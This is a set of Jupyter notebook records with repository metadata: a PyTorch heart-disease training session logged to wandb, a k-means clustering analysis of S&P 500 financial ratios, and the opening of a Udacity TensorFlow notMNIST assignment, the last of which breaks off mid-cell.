cb04345daddee6b7164bfe94a9b3b175134baf7a | 25,796 | ipynb | Jupyter Notebook | wandb/run-20210520_094039-33b0f57p/tmp/code/_session_history.ipynb | Programmer-RD-AI/Heart-Disease-UCI | b077f8496fba3fe1a9a073c80d0a5df73c720f29 | [
"Apache-2.0"
] | null | null | null | wandb/run-20210520_094039-33b0f57p/tmp/code/_session_history.ipynb | Programmer-RD-AI/Heart-Disease-UCI | b077f8496fba3fe1a9a073c80d0a5df73c720f29 | [
"Apache-2.0"
] | null | null | null | wandb/run-20210520_094039-33b0f57p/tmp/code/_session_history.ipynb | Programmer-RD-AI/Heart-Disease-UCI | b077f8496fba3fe1a9a073c80d0a5df73c720f29 | [
"Apache-2.0"
] | null | null | null | 31.381995 | 270 | 0.535742 | [
[
[
"lossess = [nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,torch.nn.MarginRankingLoss,torch.nn.TripletMarginLossnn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"import pandas as pd",
"_____no_output_____"
],
[
"data = pd.read_csv('./data.csv')",
"_____no_output_____"
],
[
"X,y = data.drop('target',axis=1),data['target']",
"_____no_output_____"
],
[
"from sklearn.model_selection import train_test_split",
"_____no_output_____"
],
[
"X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.25)",
"_____no_output_____"
],
[
"import torch\nimport torch.nn as nn",
"_____no_output_____"
],
[
"import numpy as np",
"_____no_output_____"
],
[
"X_train = torch.from_numpy(np.array(X_train).astype(np.float32))\ny_train = torch.from_numpy(np.array(y_train).astype(np.float32))\nX_test = torch.from_numpy(np.array(X_test).astype(np.float32))\ny_test = torch.from_numpy(np.array(y_test).astype(np.float32))",
"_____no_output_____"
],
[
"X_train.shape",
"torch.Size([227, 13])"
],
[
"X_test.shape",
"torch.Size([76, 13])"
],
[
"y_train.shape",
"torch.Size([227])"
],
[
"y_test.shape",
"torch.Size([76])"
],
[
"import torch.nn.functional as F",
"_____no_output_____"
],
[
"class Test_Model(nn.Module):\n def __init__(self):\n super().__init__()\n self.fc1 = nn.Linear(13,64)\n self.fc2 = nn.Linear(64,128)\n self.fc3 = nn.Linear(128,256)\n self.fc4 = nn.Linear(256,512)\n self.fc5 = nn.Linear(512,1024)\n self.fc6 = nn.Linear(1024,512)\n self.fc7 = nn.Linear(512,1)\n \n def forward(self,X):\n preds = self.fc1(X)\n preds = F.relu(preds)\n preds = self.fc2(preds)\n preds = F.relu(preds)\n preds = self.fc3(preds)\n preds = F.relu(preds)\n preds = self.fc4(preds)\n preds = F.relu(preds)\n preds = self.fc5(preds)\n preds = F.relu(preds)\n preds = self.fc6(preds)\n preds = F.relu(preds)\n preds = self.fc7(preds)\n return F.sigmoid(preds)",
"_____no_output_____"
],
[
"device = torch.device('cuda')",
"_____no_output_____"
],
[
"X_train = X_train.to(device)\ny_train = y_train.to(device)\nX_test = X_test.to(device)\ny_test = y_test.to(device)",
"_____no_output_____"
],
[
"PROJECT_NAME = 'Heart-Disease-UCI'",
"_____no_output_____"
],
[
"def get_loss(criterion,X,y,model):\n model.eval()\n with torch.no_grad():\n preds = model(X.float().to(device))\n preds = preds.view(len(preds),).to(device)\n y = y.view(len(y),).to(device)\n loss = criterion(preds,y)\n model.train()\n return loss.item()\ndef get_accuracy(preds,y):\n correct = 0\n total = 0\n for real,pred in zip(y_train,preds):\n if real == pred:\n correct += 1\n total += 1\n return round(correct/total,3)",
"_____no_output_____"
],
[
"import wandb",
"_____no_output_____"
],
[
"from tqdm import tqdm",
"_____no_output_____"
],
[
"EPOCHS = 212\n# EPOCHS = 100",
"_____no_output_____"
],
[
"# model = Test_Model().to(device)\n# optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n# criterion = nn.L1Loss()\n# wandb.init(project=PROJECT_NAME,name='baseline')\n# for _ in tqdm(range(EPOCHS)):\n# preds = model(X_train.float().to(device))\n# preds = preds.view(len(preds),)\n# preds.to(device)\n# loss = criterion(preds,y_train)\n# optimizer.zero_grad()\n# loss.backward()\n# optimizer.step()\n# wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(X_train,y_train,model),'val_accuracy':get_accuracy(X_test,y_test,model)})\n# wandb.finish()",
"_____no_output_____"
],
[
"# preds[:10]",
"_____no_output_____"
],
[
"# preds = torch.round(preds)",
"_____no_output_____"
],
[
"# correct = 0\n# total = 0\n# for real,pred in zip(y_train,preds):\n# if real == pred:\n# correct += 1\n# # total += 1",
"_____no_output_____"
],
[
"# round(correct/total,3)",
"_____no_output_____"
],
[
"## Testing Modelling",
"_____no_output_____"
],
[
"import torch\nimport torch.nn as nn",
"_____no_output_____"
],
[
"class Test_Model(nn.Module):\n def __init__(self,num_of_layers=1,activation=F.relu,input_shape=13,fc1_output=32,fc2_output=64,fc3_output=128,fc4_output=256,output_shape=1):\n super().__init__()\n self.num_of_layers = num_of_layers\n self.activation = activation\n self.fc1 = nn.Linear(input_shape,fc1_output)\n self.fc2 = nn.Linear(fc1_output,fc2_output)\n self.fc3 = nn.Linear(fc2_output,fc3_output)\n self.fc4 = nn.Linear(fc3_output,fc4_output)\n self.fc5 = nn.Linear(fc4_output,fc3_output)\n self.fc6 = nn.Linear(fc3_output,fc3_output)\n self.fc7 = nn.Linear(fc3_output,output_shape)\n \n def forward(self,X,activation=False):\n preds = self.fc1(X)\n if activation:\n preds = self.activation(preds)\n preds = self.fc2(preds)\n if activation:\n preds = self.activation(preds)\n preds = self.fc3(preds)\n if activation:\n preds = self.activation(preds)\n preds = self.fc4(preds)\n if activation:\n preds = self.activation(preds)\n preds = self.fc5(preds)\n if activation:\n preds = self.activation(preds)\n for _ in range(self.num_of_layers):\n preds = self.fc6(preds)\n if activation:\n preds = self.activation(preds)\n preds = self.fc7(preds)\n preds = F.sigmoid(preds)\n return preds",
"_____no_output_____"
],
[
"device = torch.device('cuda')",
"_____no_output_____"
],
[
"# preds = torch.round(preds)",
"_____no_output_____"
],
[
"# num_of_layers = 1\n# input_shape\n# fc1_output\n# fc2_output\n# fc3_output\n# fc4_output\n# output_shape\n# optimizer = torch.optim.SGD\n# criterion = \n# lr\n# activtion = nn.Tanh()",
"_____no_output_____"
],
[
"lossess = [nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,torch.nn.MarginRankingLoss,torch.nn.TripletMarginLossnn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"lossess = [nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,torch.nn.MarginRankingLoss,torch.nn.TripletMarginLossnn,torch.nn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"lossess = [nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,torch.nn.MarginRankingLoss,torch.nn.TripletMarginLoss,torch.nn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"# nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,\nlossess = [torch.nn.TripletMarginLoss,torch.nn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"# nn.L1Loss,nn.MSELoss,torch.nn.HingeEmbeddingLoss,\nlossess = [torch.nn.BCELoss]\nfor criterion in lossess:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.25)\n criterion = criterion()\n wandb.init(project=PROJECT_NAME,name=f'criterion-{criterion}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"lrs = [0.1,1.0,0.25,0.125,0.5,0.75,0.01,0.001,0.0001]\nfor lr in lrs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=lr)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'lr-{lr}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc1_outputs = [16,32,64,128,256]\nfor fc1_output in fc1_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh()fc1_outputs=fc1_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc1_output-{fc1_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc1_outputs = [16,32,64,128,256]\nfor fc1_output in fc1_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_outputs=fc1_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc1_output-{fc1_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc1_outputs = [16,32,64,128,256]\nfor fc1_output in fc1_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_output=fc1_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc1_output-{fc1_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc2_outputs = [16,32,64,128,256,512]\nfor fc2_output in fc2_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_output=256,fc2_output=fc2_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc2_output-{fc2_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"fc3_outputs = [16,32,64,128,256,512,1024]\nfor fc3_output in fc3_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_output=256,fc2_output=64,fc3_output=fc3_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc3_output-{fc3_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
],
[
"# num_of_layers = 1\n# fc1_output = 256\n# fc2_output = 64\n# fc3_output = 32\n# fc4_output = \n# optimizer = torch.optim.SGD\n# criterion = nn.MSELoss\n# lr = 0.125\n# activtion = nn.Tanh()",
"_____no_output_____"
],
[
"fc4_outputs = [16,32,64,128,256,512,1024,2048]\nfor fc4_output in fc4_outputs:\n model = Test_Model(num_of_layers=1,activation=nn.Tanh(),fc1_output=256,fc2_output=64,fc3_output=32,fc4_output=fc4_output).to(device)\n model.to(device)\n optimizer = torch.optim.SGD(model.parameters(),lr=0.125)\n criterion = nn.MSELoss()\n wandb.init(project=PROJECT_NAME,name=f'fc4_output-{fc4_output}')\n for _ in tqdm(range(212)):\n preds = model(X_train.float().to(device),True)\n preds = preds.view(len(preds),)\n preds.to(device)\n loss = criterion(preds,y_train)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n wandb.log({'loss':loss.item(),'val_loss':get_loss(criterion,X_test,y_test,model),'accuracy':get_accuracy(preds,y_train)})\n wandb.finish()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0441285c1642b48c8a8fb96abcd4446918cf73 | 85,844 | ipynb | Jupyter Notebook | static/python/.ipynb_checkpoints/kmeans_trial-checkpoint.ipynb | ALGEND/stockfinder.github.io | 63bad4419f505e587bfb153e24fd18b140717768 | [
"FSFAP"
] | 1 | 2019-05-14T17:41:14.000Z | 2019-05-14T17:41:14.000Z | static/python/kmeans_trial.ipynb | ALGEND/stockfinder.github.io | 63bad4419f505e587bfb153e24fd18b140717768 | [
"FSFAP"
] | null | null | null | static/python/kmeans_trial.ipynb | ALGEND/stockfinder.github.io | 63bad4419f505e587bfb153e24fd18b140717768 | [
"FSFAP"
] | null | null | null | 51.465228 | 13,940 | 0.477809 | [
[
[
"# Dependencies\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans",
"_____no_output_____"
]
],
[
[
"# Analysis of Price/Rating and Price/Action; applying match function in Excel and data plotting with Sklearn library",
"_____no_output_____"
]
],
[
[
"# Load S%P 500 constituent data\n\nkmdata = pd.read_csv('/Users/algend/Desktop/Project_3_Code/StockFinder_Dashboard_Re/static/csv/Financials_2.csv')\nkmdata.head(505)",
"_____no_output_____"
]
],
[
[
"# Best(Rating) vs Buy(Action) and/or Better(Rating) vs Sell(Action) and/or Good(Rating) vs Hold(Action) are displaying a numerical value direct match or relative data pertained to the accounts P/R and P/A tested mathematical ratios. ",
"_____no_output_____"
]
],
[
[
"# Create Array of Samples \"X1\" for Price/Earnings/Rating(P/R) vs. Price/Earnings/Action(P/A)\nX1_df = kmdata.loc[:, kmdata.columns.intersection(['PE/R', 'PE/A'])]\nX1 = X1_df.values\n#X1",
"_____no_output_____"
],
[
"plt.scatter(X1[:, 0], X1[:,1])\nplt.show()",
"_____no_output_____"
]
],
[
[
"# K-Means clustering is a fast, robust, and simple algorithm that gives reliable results when data sets are distinct or well separated from each other in a linear fashion. \n## https://brilliant.org/wiki/k-means-clustering/",
"_____no_output_____"
]
],
[
[
"# Use n_clusters=5 as the k value\nkmeans = KMeans(n_clusters=4)\n\n# Fit the model to the data\nkmeans.fit(X1)",
"_____no_output_____"
],
[
"# Predict the clusters\npredicted_clusters = kmeans.predict(X1)",
"_____no_output_____"
],
[
"plt.scatter(X1[:, 0], X1[:, 1], c=predicted_clusters, s=50, cmap='viridis')\nplt.xlabel('P/E/Rating')\nplt.ylabel('P/E/Action')\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"# Analysis Results:",
"_____no_output_____"
],
[
"# The plot is separated into 4 cluster groups from 505 samples:\n# Represents a patterned plotted linear correlation between random groups in Price/Earnings/Rating(PE/R) vs. Price/Earnings/Action(PE/A) ratios. Linear correlation assumption is due to price per earnings value present as a part of both the Rating and Action formulas. \n\n#This study assumed active\n\n",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb0461a4810025b149eb3229587ca41d02a8ea90 | 18,701 | ipynb | Jupyter Notebook | tensorflow/udacity/2_fullyconnected.ipynb | saarthakbhola/DeepLearning_Work | a88f9c78e877d11442d4e647b63a76f8a6207cc7 | [
"MIT"
] | null | null | null | tensorflow/udacity/2_fullyconnected.ipynb | saarthakbhola/DeepLearning_Work | a88f9c78e877d11442d4e647b63a76f8a6207cc7 | [
"MIT"
] | null | null | null | tensorflow/udacity/2_fullyconnected.ipynb | saarthakbhola/DeepLearning_Work | a88f9c78e877d11442d4e647b63a76f8a6207cc7 | [
"MIT"
] | null | null | null | 31.912969 | 284 | 0.568098 | [
[
[
"Deep Learning\n=============\n\nAssignment 2\n------------\n\nPreviously in `1_notmnist.ipynb`, we created a pickle with formatted datasets for training, development and testing on the [notMNIST dataset](http://yaroslavvb.blogspot.com/2011/09/notmnist-dataset.html).\n\nThe goal of this assignment is to progressively train deeper and more accurate models using TensorFlow.",
"_____no_output_____"
]
],
[
[
"# These are all the modules we'll be using later. Make sure you can import them\n# before proceeding further.\nfrom __future__ import print_function\nimport numpy as np\nimport tensorflow as tf\nfrom six.moves import cPickle as pickle\nfrom six.moves import range",
"_____no_output_____"
]
],
[
[
"First reload the data we generated in `1_notmnist.ipynb`.",
"_____no_output_____"
]
],
[
[
"pickle_file = 'notMNIST.pickle'\n\nwith open(pickle_file, 'rb') as f:\n save = pickle.load(f)\n train_dataset = save['train_dataset']\n train_labels = save['train_labels']\n valid_dataset = save['valid_dataset']\n valid_labels = save['valid_labels']\n test_dataset = save['test_dataset']\n test_labels = save['test_labels']\n del save # hint to help gc free up memory\n print('Training set', train_dataset.shape, train_labels.shape)\n print('Validation set', valid_dataset.shape, valid_labels.shape)\n print('Test set', test_dataset.shape, test_labels.shape)",
"Training set (200000, 28, 28) (200000,)\nValidation set (10000, 28, 28) (10000,)\nTest set (18724, 28, 28) (18724,)\n"
]
],
[
[
"Reformat into a shape that's more adapted to the models we're going to train:\n- data as a flat matrix,\n- labels as float 1-hot encodings.",
"_____no_output_____"
]
],
[
[
"image_size = 28\nnum_labels = 10\n\ndef reformat(dataset, labels):\n dataset = dataset.reshape((-1, image_size * image_size)).astype(np.float32)\n # Map 0 to [1.0, 0.0, 0.0 ...], 1 to [0.0, 1.0, 0.0 ...]\n labels = (np.arange(num_labels) == labels[:,None]).astype(np.float32)\n return dataset, labels\ntrain_dataset, train_labels = reformat(train_dataset, train_labels)\nvalid_dataset, valid_labels = reformat(valid_dataset, valid_labels)\ntest_dataset, test_labels = reformat(test_dataset, test_labels)\nprint('Training set', train_dataset.shape, train_labels.shape)\nprint('Validation set', valid_dataset.shape, valid_labels.shape)\nprint('Test set', test_dataset.shape, test_labels.shape)",
"Training set (200000, 784) (200000, 10)\nValidation set (10000, 784) (10000, 10)\nTest set (18724, 784) (18724, 10)\n"
]
],
[
[
"We're first going to train a multinomial logistic regression using simple gradient descent.\n\nTensorFlow works like this:\n* First you describe the computation that you want to see performed: what the inputs, the variables, and the operations look like. These get created as nodes over a computation graph. This description is all contained within the block below:\n\n with graph.as_default():\n ...\n\n* Then you can run the operations on this graph as many times as you want by calling `session.run()`, providing it outputs to fetch from the graph that get returned. This runtime operation is all contained in the block below:\n\n with tf.Session(graph=graph) as session:\n ...\n\nLet's load all the data into TensorFlow and build the computation graph corresponding to our training:",
"_____no_output_____"
]
],
[
[
"# With gradient descent training, even this much data is prohibitive.\n# Subset the training data for faster turnaround.\ntrain_subset = 10000\n\ngraph = tf.Graph()\nwith graph.as_default():\n\n # Input data.\n # Load the training, validation and test data into constants that are\n # attached to the graph.\n tf_train_dataset = tf.constant(train_dataset[:train_subset, :])\n tf_train_labels = tf.constant(train_labels[:train_subset])\n tf_valid_dataset = tf.constant(valid_dataset)\n tf_test_dataset = tf.constant(test_dataset)\n \n # Variables.\n # These are the parameters that we are going to be training. The weight\n # matrix will be initialized using random values following a (truncated)\n # normal distribution. The biases get initialized to zero.\n weights = tf.Variable(\n tf.truncated_normal([image_size * image_size, num_labels]))\n biases = tf.Variable(tf.zeros([num_labels]))\n \n # Training computation.\n # We multiply the inputs with the weight matrix, and add biases. We compute\n # the softmax and cross-entropy (it's one operation in TensorFlow, because\n # it's very common, and it can be optimized). We take the average of this\n # cross-entropy across all training examples: that's our loss.\n logits = tf.matmul(tf_train_dataset, weights) + biases\n loss = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))\n \n # Optimizer.\n # We are going to find the minimum of this loss using gradient descent.\n optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n \n # Predictions for the training, validation, and test data.\n # These are not part of training, but merely here so that we can report\n # accuracy figures as we train.\n train_prediction = tf.nn.softmax(logits)\n valid_prediction = tf.nn.softmax(\n tf.matmul(tf_valid_dataset, weights) + biases)\n test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)",
"_____no_output_____"
]
],
[
[
"Let's run this computation and iterate:",
"_____no_output_____"
]
],
[
[
"num_steps = 801\n\ndef accuracy(predictions, labels):\n return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1))\n / predictions.shape[0])\n\nwith tf.Session(graph=graph) as session:\n # This is a one-time operation which ensures the parameters get initialized as\n # we described in the graph: random weights for the matrix, zeros for the\n # biases. \n tf.global_variables_initializer().run()\n print('Initialized')\n for step in range(num_steps):\n # Run the computations. We tell .run() that we want to run the optimizer,\n # and get the loss value and the training predictions returned as numpy\n # arrays.\n _, l, predictions = session.run([optimizer, loss, train_prediction])\n if (step % 100 == 0):\n print('Loss at step %d: %f' % (step, l))\n print('Training accuracy: %.1f%%' % accuracy(\n predictions, train_labels[:train_subset, :]))\n # Calling .eval() on valid_prediction is basically like calling run(), but\n # just to get that one numpy array. Note that it recomputes all its graph\n # dependencies.\n print('Validation accuracy: %.1f%%' % accuracy(\n valid_prediction.eval(), valid_labels))\n print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))",
"Initialized\nLoss at step 0 : 17.2939\nTraining accuracy: 10.8%\nValidation accuracy: 13.8%\nLoss at step 100 : 2.26903\nTraining accuracy: 72.3%\nValidation accuracy: 71.6%\nLoss at step 200 : 1.84895\nTraining accuracy: 74.9%\nValidation accuracy: 73.9%\nLoss at step 300 : 1.60701\nTraining accuracy: 76.0%\nValidation accuracy: 74.5%\nLoss at step 400 : 1.43912\nTraining accuracy: 76.8%\nValidation accuracy: 74.8%\nLoss at step 500 : 1.31349\nTraining accuracy: 77.5%\nValidation accuracy: 75.0%\nLoss at step 600 : 1.21501\nTraining accuracy: 78.1%\nValidation accuracy: 75.4%\nLoss at step 700 : 1.13515\nTraining accuracy: 78.6%\nValidation accuracy: 75.4%\nLoss at step 800 : 1.0687\nTraining accuracy: 79.2%\nValidation accuracy: 75.6%\nTest accuracy: 82.9%\n"
]
],
[
[
"Let's now switch to stochastic gradient descent training instead, which is much faster.\n\nThe graph will be similar, except that instead of holding all the training data into a constant node, we create a `Placeholder` node which will be fed actual data at every call of `session.run()`.",
"_____no_output_____"
]
],
[
[
"batch_size = 128\n\ngraph = tf.Graph()\nwith graph.as_default():\n\n # Input data. For the training data, we use a placeholder that will be fed\n # at run time with a training minibatch.\n tf_train_dataset = tf.placeholder(tf.float32,\n shape=(batch_size, image_size * image_size))\n tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))\n tf_valid_dataset = tf.constant(valid_dataset)\n tf_test_dataset = tf.constant(test_dataset)\n \n # Variables.\n weights = tf.Variable(\n tf.truncated_normal([image_size * image_size, num_labels]))\n biases = tf.Variable(tf.zeros([num_labels]))\n \n # Training computation.\n logits = tf.matmul(tf_train_dataset, weights) + biases\n loss = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))\n \n # Optimizer.\n optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n \n # Predictions for the training, validation, and test data.\n train_prediction = tf.nn.softmax(logits)\n valid_prediction = tf.nn.softmax(\n tf.matmul(tf_valid_dataset, weights) + biases)\n test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)",
"_____no_output_____"
]
],
[
[
"Let's run it:",
"_____no_output_____"
]
],
[
[
"num_steps = 3001\n\nwith tf.Session(graph=graph) as session:\n tf.global_variables_initializer().run()\n print(\"Initialized\")\n for step in range(num_steps):\n # Pick an offset within the training data, which has been randomized.\n # Note: we could use better randomization across epochs.\n offset = (step * batch_size) % (train_labels.shape[0] - batch_size)\n # Generate a minibatch.\n batch_data = train_dataset[offset:(offset + batch_size), :]\n batch_labels = train_labels[offset:(offset + batch_size), :]\n # Prepare a dictionary telling the session where to feed the minibatch.\n # The key of the dictionary is the placeholder node of the graph to be fed,\n # and the value is the numpy array to feed to it.\n feed_dict = {tf_train_dataset : batch_data, tf_train_labels : batch_labels}\n _, l, predictions = session.run(\n [optimizer, loss, train_prediction], feed_dict=feed_dict)\n if (step % 500 == 0):\n print(\"Minibatch loss at step %d: %f\" % (step, l))\n print(\"Minibatch accuracy: %.1f%%\" % accuracy(predictions, batch_labels))\n print(\"Validation accuracy: %.1f%%\" % accuracy(\n valid_prediction.eval(), valid_labels))\n print(\"Test accuracy: %.1f%%\" % accuracy(test_prediction.eval(), test_labels))",
